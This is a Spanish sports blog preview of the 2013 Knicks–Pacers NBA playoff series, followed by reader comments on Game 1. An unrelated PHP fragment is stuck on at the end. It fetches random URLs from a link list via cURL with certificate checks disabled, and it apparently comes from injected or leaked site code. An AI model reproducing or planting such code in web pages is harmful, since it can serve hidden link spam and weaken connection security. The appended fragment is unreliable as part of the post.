Previa New York Knicks – Indiana Pacers

05 de May de 2013 por Esteban

¿La defensiva o la ofensiva? Los Knicks son los reyes del talento individual en ataque, Carmelo contra el mundo y ¡chas! tiro imposible, J.R. Smith contra el mundo y ¡chas! tiro imposible, Felton penetra en tierra de gigantes y ¡chas! tiro imposible. Todas estas buenas y llamativas jugadas en la serie solo se verán del lado de New York, pues los Pacers tienen todo menos talento individual para anotar. Lo de Indiana es el juego pausado, la rotación del balón, meter la bola a sus grandes y sacarla permanentemente, etc. Solo gracias a su enorme defensa podemos encontrarlos aquí, puesto que son uno de los peores equipos ofensivamente hablando (referido a talento individual). En cambio, los Knicks si bien han mejorado algo el apartado defensivo, basan su juego en la anotación y el tiro de tres puntos que tanto le dio de comer frente a Celtics.

¿Qué se impondrá? Depende de muchas cosas; hasta aquí hemos visto al Melo bueno y al Melo malo y creo que así se resume quien ganará. Los primeros 3 juegos frente a Boston, Carmelo tiró cualquier disparate y todos fueron adentro, mientras que en los siguientes tres juegos, lanzo los mismos disparates y todos fueron afuera. De su acierto o no dependerá la suerte de los Knicks, porque sin un Carmelo Anthony estelar no podrán con la defensiva de los Pacers.

Si la creatividad está del lado de NY, el juego inteligente está del lado de los Pacers; estos meterán una y otra y otra vez la bola a David West para que se coma a Carmelo bajo el cesto, y le darán una y otra vez la bola a George para que se imponga a Shumpert que mide 12 centímetros menos. Si los Pacers logran imponerse en esas dos posiciones en tamaño, obligarán a los Knicks a jugar con Melo de alero, y poner un ala-pivote en cancha… Novak no puede defenderse ni él mismo y Martin no puede dar esa energía si juega muchos minutos, tendrán que recurrir a Kurt Thomas. Vista la solución parecía mejor mantener a Carmelo de 4 y poner un tres más alto para emparejarlo con George (significaría sacar a Prigioni del equipo, lo que no les conviene). Me viene a la mente Copeland pero casi ni pisó la pista en la serie anterior.

En síntesis, los Pacers son un rival incómodo para los Knicks. Los de Woodson tendrán que reinventarse ya que con Carmelo de foward y shumpert de small foward será difícil contener el juego interior rival.

Por último se vuelve a mencionar la carencia en los Pacers de un hombre capaz de generarse su propio tiro en finales cerrados como si hacen Smith y Anthony, o alguien con la personalidad suficiente para tirar del carro cuando las cosas estén muy mal. Esto puede ser decisivo en una serie donde se me antojan partidos muy igualados y finales cerrados en la chiquita. 

Claves de la eliminatoria

  • La defensa sobre Melo: Sí, aquí apareces tú en el análisis, Paul George. Si alguien puede marcar de modo más que satisfactorio a Carmelo es este chaval: su longitud, velocidad y agilidad pueden darle muchísimos problemas al crack de los Knicks pues no podrá tirarle por encima fácilmente y no le podrá hacer sufrir cuando lo lleve al centro.
  • Duelos de Banco: JR Smith solo debería generar más que toda la banca de los Pacers. Los suplentes de Indiana pueden mantener la defensa de los titulares pero no tienen el talento ni individual ni colectivo para remontar un partido y anotar con consistencia, a diferencia de lo que pueden dar Smith, Kidd, Martin y Novak.
  • Hibbert vs Chandler: A pesar de su flojo arranque, Hibbert es más determinante de lo que la mayoría se atreve a admitir pero hay dudas que pueda ser factor frente a Chandler. Si se impone Hibbert habrá mas chances para los Pacers pero si Chandler lo borra de la cancha, las cosas se les complicarán.
  • Presión: A los Pacers les pesé ser el candidato frente a los Hawks pero aquí llegan de punto y la presión estará del otro lado. Sabemos que los de la gran manzana no son muy buenos en eso de sobrellevar la presión.

Pronóstico: 4-2 Los Knicks, los tiros de Melo para cerrar juegos y la falta de alguien capaz de hacerlos para los Pacers decantará la serie.

Comenta

20 comentarios a esta entrada

  1. Simon dice:
    #1

    Yo voy a decir un 4-2 para Pacers… Robarán el primero en el Madison y después se limitarán a ganar sus partidos en casa.

      Citar

  2. Vader dice:
    #2

    Me voy ha mojar… 4-1 para Knicks!!!

      Citar

  3. rumbero dice:
    #3

    Yo en la porra puse que pasaban los Pacers y después de sus respectivas series creo que voy a manterner el 2-4 aunque Melo y JR me acaben cerrando la boca. Son más equipo, por dentro deberían hacer bastante daño y George y Stephenson tiene que ayudar a que los dos cañoneros no tengan el día. Luego habrá que ver como anda el resto desde el triple y esperar que Chandler suba el listón en estos PO, sino lo van a pasar mal.

      Citar

  4. melo15 dice:
    #4

    Enlace decente para ver el partido?

      Citar

  5. MagicJohnson32 dice:
    #5

    melo15:
    Enlace decente para ver el partido?

    Mira aquí y elige el que te vaya mejor: http://forum.rojadirecta.es/showthread.php?195633-NBA-Playoffs-2013-(05-05-2013)

      Citar

  6. Jose Luis dice:
    #6

    A ver si a los Pacers no les entra vértigo, 8 arriba

      Citar

  7. Jose Luis dice:
    #7

    9 arriba, pésimos Melo y JR. George Hill tampoco ha estado muy acertado, 10 rebotazos Stephenson!

      Citar

  8. Jose Luis dice:
    #8

    Wow! 14 arriba y 6 jugadores en doble figuras en anotación!

      Citar

  9. Vader dice:
    #9

    Que mala pinta tiene esto… 🙁

      Citar

  10. rumbero dice:
    #10

    Madre mia si las está enchufando hasta Augustin.
    A ver si hay reacción de los Knicks pero pinta mal para ellos

      Citar

  11. Jose Luis dice:
    #11

    Principalmente es la defensa de los Knicks que está mal, porque sus porcentajes ofensivos son buenos, pero Indiana está lanzando un 50% y eso no pueden permitirlo.

      Citar

  12. MagicJohnson32 dice:
    #12

    Y el rebote está matando a los Knicks, la diferencia es enorme y si encima que te meten porcentajes altos te cogen los rebotes de ataque… Pero vamos, que en general los Pacers están siendo mejores.

      Citar

  13. melo15 dice:
    #13

    Parece que los Knicks se estan recuperando. Carmelo y JR estan mejor y en defensa estan mucho mas agresivos.
    Lastima la 5 de Melo.

      Citar

  14. Jose Luis dice:
    #14

    Arrivederci Knicks.

      Citar

  15. Vader dice:
    #15

    Na, este partido ha sido para tomarles la medida… Sigo pensando que pasarán los Knicks.

      Citar

  16. Esteban dice:
    #16

    final del primer juego y victoria de los pacers, asi roban la localia, con los 3 que le quedan de local llega a la final del este

    las razones del resultado

    bueno, el carmelo malo podemos decir, 27 puntos si, pero en 28 tiros, forzando la marcha a mas no poder,
    el clasico buen aporte de jr smith y a esta altura lo bueno de siempre de martin, mas algunos puntitos de coopeland q como creiamos, va a tener minuitos en la serie

    tambien como se dijo en la previa, gran juego de los 5 titulares pacers, y hibbert y west ganandole el duelo a chanoder y anthony

    el factor x? gran respuesta del minibanco de los Pacers

    solo ingresaron 4 jugador, dos de ellos fueron youn y mahinmi cque jugaron 6 y 9 minutos, y no lazaron al aro
    pero si hubo un gran aporte de dj austin con 16 puntos, con 4/5 de 3 puntos, esto no se esperaba y lo bueno de siempre de hansbrough

    tambien asistimos a la confirmacion que Paul George, no puede ni por asomo cargar con la ofensiva de los pacers

    partido que dice pocas cosas mas alla de lo bueno de robar la localia de los pacers

      Citar

  17. Jose Luis dice:
    #17

    Hombre con ganar uno fuera y ganar los demás de casa, vale. Deben defender mejor y cuidar el rebote sobre todo.

      Citar

  18. Esteban dice:
    #18

    hablabamos tambien del tamaño, y se noto en el rebote

    hibbert 8
    george 5
    west 4
    hill 7
    stephenson 13

    los knicks

    prigioni 0
    felton 2
    chandler 3
    shumpert 4
    melo 11

      Citar

  19. Simon dice:
    #19

    Simon:
    Yo voy a decir un 4-2 para Pacers… Robarán el primero en el Madison y después se limitarán a ganar sus partidos en casa.

    Se cumplió la primera parte de la profecía… ahora solo queda que cumplan en casa 🙂 🙂 🙂
    Prefiero que pasen los Pacers… pues son los únicos a los que veo plantando algo de cara a Miami ( plantando algo de cara me refiero a robarles algún partido extra y hacerles sufrir en algún otro en el este )

      Citar

  20. GreenPride dice:
    #20

    Serie muy interesante la que está enfrentando a Pacers y Knicks.
    A simple vista los Pacers tienen todo para poner muchísimos problemas a los Knicks. La apuesta de los Knicks por el small ball con Melo de 4 les dará muchos problemas ya que les sitúa en clara inferioridad tanto en el puesto de 3 como en el de 4. David West puede hacer defender mucho a Melo metiéndole en faltas y cansándole para luego el ataque de los Knicks en el que Melo es decisivo.
    Además la defensa de los Pacers es la número uno de la liga en números y seguro que va a dificultar más un ataque ya de por sí extraño y basado en el 1×1 como el de los Knicks. Con Hibbert dentro la zona no va a ser lugar de anotación fácil para New York que va a necesitar más que nunca el acierto de sus exteriores en los triples para poder anotar con fluidez.
    Si algo me hace pensar en los Knicks como favoritos sólo es el pensar que Indiana carece de un jugador referencia en los finales de partidos (George no ha demostrado que lo sea) mientras que New York tiene a Melo y que la experiencia y el banquillo está claramente del lado de los de la Gran Manzana.
    Claves:
    Defensa interior de los Knicks: ¿Cómo parar a West&Hibbert? ¿Cambiar las rotaciones para poner dos interiores de verdad metiéndo a jugadores que casi no juegan como Camby o Thomas y dejando menos minutos para Kidd o Prigioni?
    Ataque de los Knicks frente a la mejor defensa de la liga
    Banquillos: Los Knicks deben aprovechar al máximo los momentos en los que el banquillo esté en cancha donde debería ser bastante superior.
    Pronóstico: Me resulta realmente difícil darlo pero vista la primera ronda apostaré por los Knicks en el 7º partido al abrigo del Madison

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>